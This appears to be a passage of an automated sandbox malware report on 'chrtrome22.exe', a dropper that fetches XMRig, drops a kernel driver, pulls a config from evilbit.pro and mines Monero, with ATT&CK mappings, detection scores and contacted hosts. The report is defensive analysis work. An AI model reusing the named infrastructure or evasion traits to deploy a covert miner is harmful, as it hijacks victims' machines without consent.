                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597812Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597703Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597593Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597260Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597046Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596718Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596608Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596499Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595953Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595843Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595734Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595624Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595515Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595406Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595296Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595187Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 594967Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeWindow / User API: threadDelayed 1841Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeWindow / User API: threadDelayed 8005Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeDropped PE file which has not been started: C:\xmrig\xmrig-6.22.2\WinRing0x64.sysJump to dropped file
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 180Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599233s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598905s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -598031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597260s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -597046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596608s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596499s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -596062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -595078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -594967s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exe TID: 2924Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599233Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598577Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598249Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598031Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597921Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597812Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597703Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597593Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597260Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597046Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596718Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596608Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596499Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595953Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595843Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595734Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595624Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595515Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595406Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595296Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595187Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 594967Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 594859Jump to behavior
                    Source: chrtrome22.exe, 00000000.00000002.1759218717.000000001D265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: xmrig.exe, 00000002.00000002.4117633923.000002B86C509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: chrtrome22.exe, 00000000.00000002.1759218717.000000001D265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
                    Source: chrtrome22.exe, 00000000.00000002.1758161002.000000001B5AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json Jump to behavior
                    Source: conhost.exe, 00000003.00000002.4116908819.0000023618690000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000003.00000002.4116908819.0000023618690000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: conhost.exe, 00000003.00000002.4116908819.0000023618690000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: conhost.exe, 00000003.00000002.4116908819.0000023618690000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\Users\user\Desktop\chrtrome22.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    Windows Service                    		1
                    Windows Service                    		1
                    Masquerading                    		OS Credential Dumping21
                    Security Software Discovery                    		Remote ServicesData from Local System1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		12
                    Process Injection                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		131
                    Virtualization/Sandbox Evasion                    		Security Account Manager131
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586514 Sample: chrtrome22.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 29 wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun 2->29 31 evilbit.pro 2->31 33 4 other IPs or domains 2->33 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 4 other signatures 2->49 8 chrtrome22.exe 15 20 2->8         started        signatures3 process4 dnsIp5 35 wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun 206.189.156.69, 49733, 80 DIGITALOCEAN-ASNUS United States 8->35 37 evilbit.pro 172.67.144.26, 443, 49732 CLOUDFLARENETUS United States 8->37 39 2 other IPs or domains 8->39 21 C:\xmrig\xmrig-6.22.2\xmrig.exe, PE32+ 8->21 dropped 23 C:\xmrig\xmrig-6.22.2\WinRing0x64.sys, PE32+ 8->23 dropped 25 C:\xmrig\xmrig-6.22.2\config.json, JSON 8->25 dropped 27 C:\Users\user\AppData\...\chrtrome22.exe.log, CSV 8->27 dropped 51 Sample is not signed and drops a device driver 8->51 53 Reads the Security eventlog 8->53 55 Reads the System eventlog 8->55 13 xmrig.exe 1 8->13         started        17 conhost.exe 8->17         started        file6 signatures7 process8 dnsIp9 41 pool-fr.supportxmr.com 141.94.96.144, 443, 49734 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 13->41 57 Antivirus detection for dropped file 13->57 59 Multi AV Scanner detection for dropped file 13->59 61 Query firmware table information (likely to detect VMs) 13->61 63 2 other signatures 13->63 19 conhost.exe 13->19         started        signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    chrtrome22.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    chrtrome22.exe58%VirustotalBrowse
                    chrtrome22.exe100%AviraHEUR/AGEN.1308614
                    chrtrome22.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\xmrig\xmrig-6.22.2\xmrig.exe100%AviraHEUR/AGEN.1311679
                    C:\xmrig\xmrig-6.22.2\xmrig.exe100%Joe Sandbox ML
                    C:\xmrig\xmrig-6.22.2\WinRing0x64.sys5%ReversingLabs
                    C:\xmrig\xmrig-6.22.2\xmrig.exe74%ReversingLabsWin64.Trojan.Miner

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://evilbit.pro0%Avira URL Cloudsafe
                    https://miningpoolstats.stream/raptoreum0%Avira URL Cloudsafe
                    https://evilbit.pro/config.json0%Avira URL Cloudsafe
                    http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun0%Avira URL Cloudsafe
                    https://miningpoolstats.stream/monero0%Avira URL Cloudsafe
                    http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/0%Avira URL Cloudsafe
                    https://evilbit.pro0%Avira URL Cloudsafe
                    http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/p0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    pool-fr.supportxmr.com
                    		141.94.96.144
                    		truefalse
                      		unknown
                      evilbit.pro
                      		172.67.144.26
                      		truetrue
                        		unknown
                        github.com
                        		140.82.121.4
                        		truefalse
                          		high
                          wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
                          		206.189.156.69
                          		truetrue
                            		unknown
                            objects.githubusercontent.com
                            		185.199.110.133
                            		truefalse
                              		high
                              pool.supportxmr.com
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zipfalse
                                  		high
                                  https://evilbit.pro/config.jsontrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://github.comchrtrome22.exe, 00000000.00000002.1755040993.0000000002C4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-chrtrome22.exe, 00000000.00000002.1755040993.0000000002C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://miningpoolstats.stream/raptoreumchrtrome22.exe, 00000000.00000002.1755040993.0000000002E68000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, rtm_ghostrider_example.cmd.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://objects.githubusercontent.comchrtrome22.exe, 00000000.00000002.1755040993.0000000002C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://evilbit.prochrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.comchrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://evilbit.prochrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://xmrig.com/wizard%sxmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drfalse
                                            		high
                                            https://xmrig.com/docs/algorithmsxmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drfalse
                                              		high
                                              https://xmrig.com/benchmark/%sxmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drfalse
                                                		high
                                                http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funchrtrome22.exe, chrtrome22.exe, 00000000.00000002.1755040993.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://miningpoolstats.stream/monerochrtrome22.exe, 00000000.00000002.1755040993.0000000002E46000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, pool_mine_example.cmd.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://xmrig.com/wizardxmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drfalse
                                                  		high
                                                  http://objects.githubusercontent.comchrtrome22.exe, 00000000.00000002.1755040993.0000000002C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/pchrtrome22.exe, 00000000.00000002.1755040993.00000000030C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      172.67.144.26
                                                      		evilbit.proUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      140.82.121.4
                                                      		github.comUnited States
                                                      		36459GITHUBUSfalse
                                                      206.189.156.69
                                                      		wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funUnited States
                                                      		14061DIGITALOCEAN-ASNUStrue
                                                      185.199.110.133
                                                      		objects.githubusercontent.comNetherlands
                                                      		54113FASTLYUSfalse
                                                      141.94.96.144
                                                      		pool-fr.supportxmr.comGermany
                                                      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1586514
                                                      Start date and time:2025-01-09 08:41:15 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 7s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:chrtrome22.exe
                                                      Detection:MAL
                                                      Classification:mal100.evad.mine.winEXE@5/14@5/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 3
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
